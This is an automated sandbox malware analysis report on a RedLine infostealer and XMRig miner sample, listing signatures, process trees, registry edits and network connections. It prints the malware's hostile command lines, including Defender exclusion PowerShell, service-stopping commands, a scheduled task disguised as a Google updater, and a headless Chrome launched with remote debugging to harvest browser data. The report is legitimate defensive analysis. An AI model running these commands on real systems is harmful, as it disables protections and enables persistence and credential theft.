Malware Analysis Report

2025-01-18 09:17

Sample ID 230808-aawhhsbd4t
Target cc4d8fc3c02d1706c374f38b4f8074e0.exe
SHA256 829c8a42d65b1587d2067127d22ed243d75c50e3b0830344dd5d64ac6ce390de
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

829c8a42d65b1587d2067127d22ed243d75c50e3b0830344dd5d64ac6ce390de

Threat Level: Known bad

The file cc4d8fc3c02d1706c374f38b4f8074e0.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner

xmrig

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Themida packer

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-08 00:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-08 00:01

Reported

2023-08-08 00:03

Platform

win7-20230712-en

Max time kernel

44s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe"

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1892 set thread context of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [omitted] C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [omitted] C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [omitted] C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [omitted] C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2568 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2544 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2568 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1892 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2572 wrote to memory of 1320 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe

"C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 108

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=52590 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6039758,0x7fef6039768,0x7fef6039778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=872 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=52590 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1448 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1232 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1884 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2396 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1728 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2540 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2668 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2664 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {CA43C103-1722-4163-8F54-4C44D4F58FA3} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11775245162040761005-554534607-157596740141596971-235724060-1954840179585178591"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.68:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.34:443 googleads.g.doubleclick.net tcp
NL 142.251.36.34:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 i2.ytimg.com udp
NL 142.250.179.174:443 i2.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
